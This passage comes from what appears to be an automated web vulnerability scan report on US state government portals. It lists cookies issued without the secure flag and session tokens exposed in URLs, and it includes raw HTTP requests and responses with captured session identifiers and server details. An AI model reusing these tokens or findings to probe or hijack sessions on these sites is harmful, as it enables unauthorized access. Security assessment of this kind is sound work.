Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:28:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=2ED0072C72C910722131D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Last-Modified: Thu, 07 Oct 2010 15:11:19 GMT
ETag: "1f8dfc-522e-4e5db3c0"
Accept-Ranges: bytes
Content-Length: 21038
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/* WebTrends SmartSource Data Collector Tag
   Version: 8.6.2
   Tag Builder Version: 3.0
   Created: 4/1/2009 5:35:05 PM
   Updated for double tagging
   State of Ohio Ohio457.org */

function WebT
...[SNIP]...

7.151. https://www.nrsservicecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=2B79DD6E72C9107208B8A4861F3DF71F; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; MyNRSSite=Ohio457; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=302A2BC072C910721079FD47DEDA6F26

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:38:26 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=8B164DF672CA107204E7B0604E433874; Path=/; Domain=.nrsservicecenter.com
Content-Length: 332
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr />
...[SNIP]...

7.152. https://www.ri.gov/Licensing/renewal/license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ri.gov
Path:   /Licensing/renewal/license.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Licensing/renewal/license.php HTTP/1.1
Host: www.ri.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=53040939.1304117314.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=53040939.341417921.1304117314.1304117314.1304117314.1; font_level=0; __utmc=53040939; __utmb=53040939.3.10.1304117314; switchable_style=normal;

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:40:06 GMT
Server: www
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 30 Apr 2011 12:40:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=ohu9uko90gmil46imdcoddrbm5; path=/
Location: /Licensing/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1


7.153. https://www.scsignon.sc.gov/Common/HelpWindow.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Common/HelpWindow.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Common/HelpWindow.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:07 GMT
Connection: close
Set-Cookie: TS958e6e=dfdcf9946f9839514d16f4e3c29e87328f3c5cdacd73a69a4dbc0328; Path=/
Vary: Accept-Encoding
Content-Length: 32551


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...

7.154. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotPassword.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Eng/Secured/Security/ForgotPassword.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:11 GMT
Connection: close
Content-Length: 35565
Set-Cookie: TS958e6e=03bbad503533905e4d507c70b83d12198f3c5cdacd73a69a4dbc032c; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Forgot Password - Enter User
Name
       </title>
       <meta http-equiv="Content-Type" con
...[SNIP]...

7.155. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Eng/Secured/Security/ForgotUserName.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Eng/Secured/Security/ForgotUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:14 GMT
Connection: close
Content-Length: 35777
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Forgot
User Name
       </title>
       <meta http-equiv="Content-Type" content="text/html
...[SNIP]...

7.156. https://www.scsignon.sc.gov/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:13 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...

7.157. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.DynamicFormsGlobal.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.DynamicFormsGlobal.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:15 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=ea57241c9d8bd2dfd124d91fd42af58a8f3c5cdacd73a69a4dbc0330; Path=/


7.158. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Imaging.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Imaging.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: private
Expires: Wed, 04 May 2011 12:40:18 GMT
Last-Modified: Sat, 30 Apr 2011 12:40:18 GMT
Accept-Ranges: bytes
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:18 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=003288ad0d54e7fe802efdbf53043c4b8f3c5cdacd73a69a4dbc0332; Path=/


7.159. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.Controls.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Web.Controls.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:17 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=e2083b6514de1f591e4b161aac9d05358f3c5cdacd73a69a4dbc0333; Path=/


7.160. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /SCBOS.Core.Framework.Web.UI.Resources.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SCBOS.Core.Framework.Web.UI.Resources.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:19 GMT
Connection: close
Content-Length: 0
Set-Cookie: TS958e6e=eacd5b74d8dff056de0edce1c2f313e28f3c5cdacd73a69a4dbc0334; Path=/


7.161. https://www.scsignon.sc.gov/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:20 GMT
Connection: close
Set-Cookie: TS958e6e=274ee5e0c50b7433045d42ee8c81d6e48f3c5cdacd73a69a4dbc0335; Path=/
Vary: Accept-Encoding
Content-Length: 32144


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS - Welcome to the South Carolina Business One Stop
       </title>
       <meta http-equiv="Con
...[SNIP]...

7.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /eng/Secured/Security/CreateUserName.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eng/Secured/Security/CreateUserName.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:08 GMT
Connection: close
Content-Length: 35575
Set-Cookie: TS958e6e=226dae4efe979dc85adeff56f4125f3a8f3c5cdacd73a69a4dbc0329; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           SCBOS Register User - Create User Name
       </title>
       <meta http-equiv="Content-Type" conten
...[SNIP]...

8. Session token in URL  previous  next
There are 29 instances of this issue:


8.1. http://apps.tn.gov/bizreg/tax.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://apps.tn.gov
Path:   /bizreg/tax.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bizreg/tax.jsp;jsessionid=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1 HTTP/1.1
Host: apps.tn.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.0 302 Found
Location: https://apps.tn.gov/bizreg/tax.jsp;jsessionid=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1
Server: BigIP
Connection: Keep-Alive
Content-Length: 0


8.2. https://apps.tn.gov/bizreg/tax.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /bizreg/tax.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bizreg/tax.jsp;jsessionid=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1 HTTP/1.1
Host: apps.tn.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:58 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 4949
Keep-Alive: timeout=30, max=5500
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<html lang="en-US"><!-- #BeginTemplate "/Templates/bizreg.dwt" --><!-- DW6 -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>
...[SNIP]...

8.3. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC002.asp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum= HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:07 GMT; path=/
Date: Sat, 30 Apr 2011 00:37:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 18711
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:37:42 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

8.4. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC002.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum= HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:07 GMT; path=/
Date: Sat, 30 Apr 2011 00:37:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 18711
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:37:42 GMT
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...
<td>
   <a Href='SC031.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=0' class='white_color' target='_blank'>Learn About ASSIST</a>
...[SNIP]...
</SPAN>
<a Href='SC024.asp?hdn_SessionId=4371217393632042911203737&amp;hdn_ApplicationNum=0&amp;hdn_HelpPage=SC002&amp;hdn_Language=EN' class='white_color' target='_blank'>Help</a>
...[SNIP]...
</SPAN>
<a Href='SC024.asp?hdn_SessionId=4371217393632042911203737&amp;hdn_ApplicationNum=0&amp;hdn_HelpPage=SC002&amp;hdn_Language=EN' class='blue_color' target='_blank'>Help</a>
...[SNIP]...

8.5. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /PGM/ASP/SC020.asp?hdn_Language=EN&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 302 Object moved
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:05 GMT; path=/
Date: Sat, 30 Apr 2011 00:37:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: SC002.asp?hdn_SessionId=8993928217388042911203740&hdn_ApplicationNum=
Content-Length: 194
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="SC002.asp?hdn_SessionId=8993928217388042911203740&amp;hdn_ApplicationNum=">here</a>.</body>

8.6. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://az.gov
Path:   /app/calendar/CalendarRemoteDisplay.xhtml

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /app/calendar/CalendarRemoteDisplay.xhtml HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
Referer: http://az.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)
Date: Sat, 30 Apr 2011 11:15:03 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: application/xhtml+xml;charset=UTF-8
Content-Length: 6032
Set-Cookie: JSESSIONID=D59995EC79DD38BD722B830119C04CCB; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
